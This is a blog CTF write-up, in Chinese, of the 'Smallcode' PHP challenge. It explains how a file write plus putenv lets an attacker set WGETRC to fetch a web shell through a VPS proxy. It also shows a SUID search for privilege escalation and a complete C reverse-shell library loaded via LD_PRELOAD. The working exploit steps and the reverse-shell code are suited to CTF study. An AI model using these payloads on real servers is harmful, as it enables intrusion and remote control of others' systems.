<!doctype html>
<html lang="en-US">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="generator" content="VuePress 2.0.0-rc.20" />
    <style>
      :root {
        --vp-c-bg: #fff;
      }

      [data-theme='dark'] {
        --vp-c-bg: #1b1b1f;
      }

      html,
      body {
        background-color: var(--vp-c-bg);
      }
    </style>
    <script>
      const useChoice = localStorage.getItem('vuepress-color-scheme')
      const systemStatus =
        'matchMedia' in window
          ? window.matchMedia('(prefers-color-scheme: dark)').matches
          : false

      if (useChoice === 'light') {
        document.documentElement.dataset.theme = 'light'
      } else if (useChoice === 'dark' || systemStatus) {
        document.documentElement.dataset.theme = 'dark'
      }
    </script>
    <title>Smallcode | Songsanggggg's Home</title><meta name="description" content="Songsanggggg's Blog Site">
    <link rel="preload" href="/assets/style-CZlZBiRp.css" as="style"><link rel="stylesheet" href="/assets/style-CZlZBiRp.css">
    <link rel="modulepreload" href="/assets/app-C2I5gSR0.js"><link rel="modulepreload" href="/assets/Smallcode.html-DYxy2t-n.js">
    <link rel="prefetch" href="/assets/index.html-BZ5k9iZA.js" as="script"><link rel="prefetch" href="/assets/Celerace.html-BRtiq2Sx.js" as="script"><link rel="prefetch" href="/assets/RBAC.html-BHj8wkyZ.js" as="script"><link rel="prefetch" href="/assets/SafeBank.html-CxY3Xwhw.js" as="script"><link rel="prefetch" href="/assets/SelfIntroduction.html-Dhp5FjgH.js" as="script"><link rel="prefetch" href="/assets/胶片预览.html-C38OyNQB.js" as="script"><link rel="prefetch" href="/assets/404.html-CeWR_Bvo.js" as="script"><link rel="prefetch" href="/assets/index.html-Be-xO_Ma.js" as="script"><link rel="prefetch" href="/assets/index.html-CZFEkRu5.js" as="script"><link rel="prefetch" href="/assets/index.html-41gOjXbq.js" as="script"><link rel="prefetch" href="/assets/index.html-BXUmV-R2.js" as="script"><link rel="prefetch" href="/assets/index.html-B7YatMRT.js" as="script"><link rel="prefetch" href="/assets/index.html-DxUDMcfG.js" as="script"><link rel="prefetch" href="/assets/index.html-DGcfMQQF.js" as="script"><link rel="prefetch" href="/assets/index.html-Dunb2QaA.js" as="script"><link rel="prefetch" href="/assets/index.html-48QUPJ1a.js" as="script"><link rel="prefetch" href="/assets/index.html-BZvTmejS.js" as="script"><link rel="prefetch" href="/assets/index.html-LwD7iIqn.js" as="script"><link rel="prefetch" href="/assets/index.html-Dnbx9TEO.js" as="script"><link rel="prefetch" href="/assets/index.html-A5GszBwG.js" as="script"><link rel="prefetch" href="/assets/index.html-BAhLMrqd.js" as="script">
  </head>
  <body>
    <div id="app"><!--[--><div class="vp-theme-container external-link-icon" vp-container><!--[--><header class="vp-navbar" vp-navbar><div class="vp-toggle-sidebar-button" title="toggle sidebar" aria-expanded="false" role="button" tabindex="0"><div class="icon" aria-hidden="true"><span></span><span></span><span></span></div></div><span><a class="route-link" href="/"><img class="vp-site-logo" src="https://avatars.githubusercontent.com/u/95994511" alt="Songsanggggg&#39;s Home"><span class="vp-site-name vp-hide-mobile" aria-hidden="true">Songsanggggg&#39;s Home</span></a></span><div class="vp-navbar-items-wrapper" style=""><!--[--><!--]--><nav class="vp-navbar-items vp-hide-mobile" aria-label="site navigation"><!--[--><div class="vp-navbar-item"><a class="route-link auto-link" href="/" aria-label="Home"><!--[--><!--[--><!--]--><!--]-->Home<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/article/" aria-label="Article"><!--[--><!--[--><!--]--><!--]-->Article<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/category/" aria-label="Category"><!--[--><!--[--><!--]--><!--]-->Category<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/tag/" aria-label="Tag"><!--[--><!--[--><!--]--><!--]-->Tag<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/timeline/" aria-label="Timeline"><!--[--><!--[--><!--]--><!--]-->Timeline<!--[--><!--[--><!--]--><!--]--></a></div><!--]--></nav><!--[--><!--]--><button type="button" class="vp-toggle-color-mode-button" title="toggle color mode"><svg class="light-icon" viewbox="0 0 32 32" style=""><path d="M16 12.005a4 4 0 1 1-4 4a4.005 4.005 0 0 1 4-4m0-2a6 6 0 1 0 6 6a6 6 0 0 0-6-6z" fill="currentColor"></path><path d="M5.394 6.813l1.414-1.415l3.506 3.506L8.9 10.318z" fill="currentColor"></path><path d="M2 15.005h5v2H2z" fill="currentColor"></path><path d="M5.394 25.197L8.9 21.691l1.414 1.415l-3.506 3.505z" fill="currentColor"></path><path d="M15 25.005h2v5h-2z" fill="currentColor"></path><path d="M21.687 23.106l1.414-1.415l3.506 3.506l-1.414 1.414z" fill="currentColor"></path><path d="M25 15.005h5v2h-5z" fill="currentColor"></path><path d="M21.687 8.904l3.506-3.506l1.414 1.415l-3.506 3.505z" fill="currentColor"></path><path d="M15 2.005h2v5h-2z" fill="currentColor"></path></svg><svg class="dark-icon" viewbox="0 0 32 32" style="display:none;"><path d="M13.502 5.414a15.075 15.075 0 0 0 11.594 18.194a11.113 11.113 0 0 1-7.975 3.39c-.138 0-.278.005-.418 0a11.094 11.094 0 0 1-3.2-21.584M14.98 3a1.002 1.002 0 0 0-.175.016a13.096 13.096 0 0 0 1.825 25.981c.164.006.328 0 .49 0a13.072 13.072 0 0 0 10.703-5.555a1.01 1.01 0 0 0-.783-1.565A13.08 13.08 0 0 1 15.89 4.38A1.015 1.015 0 0 0 14.98 3z" fill="currentColor"></path></svg></button><!----></div></header><!--]--><div class="vp-sidebar-mask"></div><!--[--><aside class="vp-sidebar" vp-sidebar><nav class="vp-navbar-items" aria-label="site navigation"><!--[--><div class="vp-navbar-item"><a class="route-link auto-link" href="/" aria-label="Home"><!--[--><!--[--><!--]--><!--]-->Home<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/article/" aria-label="Article"><!--[--><!--[--><!--]--><!--]-->Article<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/category/" aria-label="Category"><!--[--><!--[--><!--]--><!--]-->Category<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/tag/" aria-label="Tag"><!--[--><!--[--><!--]--><!--]-->Tag<!--[--><!--[--><!--]--><!--]--></a></div><div class="vp-navbar-item"><a class="route-link auto-link" href="/timeline/" aria-label="Timeline"><!--[--><!--[--><!--]--><!--]-->Timeline<!--[--><!--[--><!--]--><!--]--></a></div><!--]--></nav><!--[--><!--]--><ul class="vp-sidebar-items"><!--[--><li><p tabindex="0" class="vp-sidebar-item vp-sidebar-heading">Smallcode <!----></p><!----></li><!--]--></ul><!--[--><!--]--></aside><!--]--><!--[--><main class="vp-page"><!--[--><!--]--><div vp-content><!--[--><!--]--><div><h1 id="smallcode" tabindex="-1"><a class="header-anchor" href="#smallcode"><span>Smallcode</span></a></h1><p>​ 本题来自2025强网拟态的线上赛，其中除了预期解还有Pikaball提供的一个非预期解。</p><h2 id="题目源码" tabindex="-1"><a class="header-anchor" href="#题目源码"><span>题目源码</span></a></h2><div class="language-php line-numbers-mode" data-highlighter="prismjs" data-ext="php"><pre><code><span class="line"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span></span>
<span class="line">    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span>
<span class="line">    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">&#39;context&#39;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span></span>
<span class="line">        <span class="token variable">$context</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">&#39;context&#39;</span><span class="token punctuation">]</span><span class="token punctuation">;</span></span>
<span class="line">        <span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;1.txt&quot;</span><span class="token punctuation">,</span><span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$context</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span>
<span class="line">    <span class="token punctuation">}</span></span>
<span class="line"></span>
<span class="line">    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">&#39;env&#39;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">{</span></span>
<span class="line">        <span class="token variable">$env</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">&#39;env&#39;</span><span class="token punctuation">]</span><span class="token punctuation">;</span></span>
<span class="line">        <span class="token function">putenv</span><span class="token punctuation">(</span><span class="token variable">$env</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span>
<span class="line">    <span class="token punctuation">}</span></span>
<span class="line">    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string double-quoted-string">&quot;nohup wget --content-disposition -N hhhh &amp;&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span>
<span class="line"></span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>​ 代码提供了两个接口，分别是向指定的 1.txt 任意写入内容和任意设置环境变量。</p><h2 id="预期解" tabindex="-1"><a class="header-anchor" href="#预期解"><span>预期解</span></a></h2><p>​ 在 wget 中提供了一个默认配置文件，默认位置是 <code>/usr/local/etc/wgetrc</code> 其中的配置会在每次 wget 调用时候加载。</p><p>​ 其中 wget 配置文件的地址可以使用 WGETRC 环境变量进行指定，其中对于文件名称和文件后缀没有强制要求，所以本题中我们可以通过指定 1.txt 为 WGETRC 的值，内容修改为：</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh"><pre><code><span class="line"><span class="token assign-left variable">http_proxy</span><span class="token operator">=</span>vpsip:8888</span>
<span class="line"><span class="token assign-left variable">output_document</span><span class="token operator">=</span>/var/www/html/myshell.php</span>
<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div></div></div><p>​ 我们指定 wget 的代理为我们 vps 的地址，并且将下载文件保存在 myshell.php 中。</p><p>​ 其实也可以了利用 <code>--content-disposition</code> 参数在vps中直接在请求头中下发存储目录。</p><p>​ 之后就实现了 RCE , 接下来就是一个提权。</p><div class="language-bash line-numbers-mode" data-highlighter="prismjs" data-ext="sh"><pre><code><span class="line"><span class="token function">find</span> / <span class="token parameter variable">-user</span> root <span class="token parameter variable">-perm</span> <span class="token parameter variable">-u</span><span class="token operator">=</span>s <span class="token parameter variable">-print</span> <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span>/dev/null</span>
<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div></div></div><h2 id="牛逼解" tabindex="-1"><a class="header-anchor" href="#牛逼解"><span>牛逼解</span></a></h2><p>​ Pikaball 提供了一个牛逼解，该解的主要思路是通过 LD_PRELOAD 环境变量，使得 php 在进行动态链接的时候，加载我们的恶意动态链接库。</p><p>​ 我们可以在 1.txt 中写入恶意动态链接库的内容，并且在 LD_PRELOAD 中指向恶意的动态链接库。</p><div class="language-c++ line-numbers-mode" data-highlighter="prismjs" data-ext="c++"><pre><code><span class="line">#include&lt;stdio.h&gt;</span>
<span class="line">#include&lt;stdlib.h&gt;</span>
<span class="line">#include&lt;sys/socket.h&gt;</span>
<span class="line">#include &lt;unistd.h&gt;</span>
<span class="line">#include &lt;arpa/inet.h&gt;</span>
<span class="line">#include&lt;netinet/in.h&gt;</span>
<span class="line">char *server_ip=&quot;&quot;;</span>
<span class="line">uint32_t server_port=9999;</span>
<span class="line">static void reverse_shell(void) __attribute__((constructor));</span>
<span class="line">static void reverse_shell(void)</span>
<span class="line">{</span>
<span class="line">    int sock = socket(AF_INET, SOCK_STREAM, 0);</span>
<span class="line">    struct sockaddr_in attacker_addr = {0};</span>
<span class="line">    attacker_addr.sin_family = AF_INET;</span>
<span class="line">    attacker_addr.sin_port = htons(server_port);</span>
<span class="line">    attacker_addr.sin_addr.s_addr = inet_addr(server_ip);</span>
<span class="line">    if(connect(sock, (struct sockaddr *)&amp;attacker_addr,sizeof(attacker_addr))!=0)</span>
<span class="line">        exit(0);</span>
<span class="line">    dup2(sock, 0);</span>
<span class="line">    dup2(sock, 1);</span>
<span class="line">    dup2(sock, 2);</span>
<span class="line">    execve(&quot;/bin/bash&quot;, 0, 0);</span>
<span class="line">}</span>
<span class="line"></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>​ Pikaball 的牛逼反弹 shell。<code>gcc hello.c -shared -fPIC -o libhello.so</code></p><p>​ 其中<code>static void reverse_shell(void) __attribute__((constructor));</code>使得在加载该 .so 文件时候，会自动调用 reverse_shell 函数，实现反弹 shell。</p><p>​ 但是在本题中并不出网，所以 Pikaball 大师选择使用写入文件到同目录文件下，之后通过 web 服务查看即可。</p></div><!--[--><!--]--></div><footer class="vp-page-meta"><!----><div class="vp-meta-item git-info"><div class="vp-meta-item last-updated"><span class="meta-item-label">Last Updated:: </span><time class="meta-item-info" datetime="2026-01-19T05:36:17.000Z" data-allow-mismatch>1/19/26, 5:36 AM</time></div><div class="vp-meta-item contributors"><span class="meta-item-label">Contributors: </span><span class="meta-item-info"><!--[--><!--[--><span class="contributor" title="email: bxgh6_xivkv71ra8@163.com">songsanggggg</span><!----><!--]--><!--]--></span></div></div></footer><!----><!--[--><!--]--></main><!--]--></div><!--[--><!----><!--]--><!--]--></div>
    <script type="module" src="/assets/app-C2I5gSR0.js" defer></script>
  </body>
</html>
